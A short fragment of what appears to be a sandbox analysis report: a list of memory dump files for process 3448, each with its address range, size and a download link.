                  • memory/3448-311-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-312-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-314-0x00000000013B0000-0x00000000013B1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-167-0x00000000011E0000-0x00000000011E1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3448-275-0x00000000013B0000-0x00000000013B2000-memory.dmp

                    Filesize

                    8KB

                    Download